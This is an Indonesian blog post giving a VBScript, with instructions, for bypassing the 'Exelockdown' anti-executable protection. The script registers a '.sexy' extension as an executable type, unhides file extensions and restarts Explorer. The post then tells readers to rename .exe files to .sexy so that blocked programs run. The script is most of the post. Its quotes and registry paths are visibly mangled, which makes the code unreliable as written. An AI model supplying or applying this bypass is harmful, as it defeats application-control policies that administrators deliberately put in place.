const HKEY_CLASSES_ROOT = &H80000000
const HKEY_CURRENT_USER = &H80000001
QUOT = chr(34)
strComputer = “.”
On error resume next
Tanya = MsgBox(”By Pass Exelockdown dengan Registry Shell Spawning”& _
vbNewLine & “Reset Exelockdown?”, 36,”Exelockdown Hacking – by Lovepassword”)
If Tanya = 6 Then ‘Bila dipilih YA
Set objRegistry = GetObject(”winmgmts:{impersonationLevel=impersonat e}!\” &strComputer & ” ootdefault:StdRegProv”)
objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexy”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,,”exefile”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,”Content Type”,”application/x-msdownload”
objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexyPersistentHandler”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexyPersistentHandler”,,”{098f 2470-bae0-11cd-b579-08002b30bfeb}”
objRegistry.CreateKey HKEY_CURRENT_USER, “SoftwareMicrosoftWindowsCurrentVersionExplorerAdv anced”
objRegistry.SetDWORDValue HKEY_CURRENT_USER,”SoftwareMicrosoftWindowsCurrent VersionExplorerAdvanced”,”HideFileExt”,0
Set objWMIService = GetObject(”winmgmts:” _
& “{impersonationLevel=impersonate}!\” & strComputer & ” ootcimv2?)
Set colProcessList = objWMIService.ExecQuery _
(”SELECT * FROM Win32_Process WHERE Name = ‘explorer.exe’”)
For Each objProcess in colProcessList
objProcess.Terminate()
Next
set objShell = createobject(”Wscript.Shell”)
objShell.Run “explorer.exe”
msgbox “Copi file exe, rename menjadi file sexy, lalu jalankan”,vbInformation,”Exelockdown Hacking – by 060183”
End If
Silakan copy paste di notepad lalu pilih all files dan simpan dengan extensi .vbs.. jalankan…
Kemudian ubah extensi file .exe jadi .sexy Maka anda selamat dari pencekalan software anti executable. Ingat jangan disalah gunakan OK!!
Tidak ada komentar:
Posting Komentar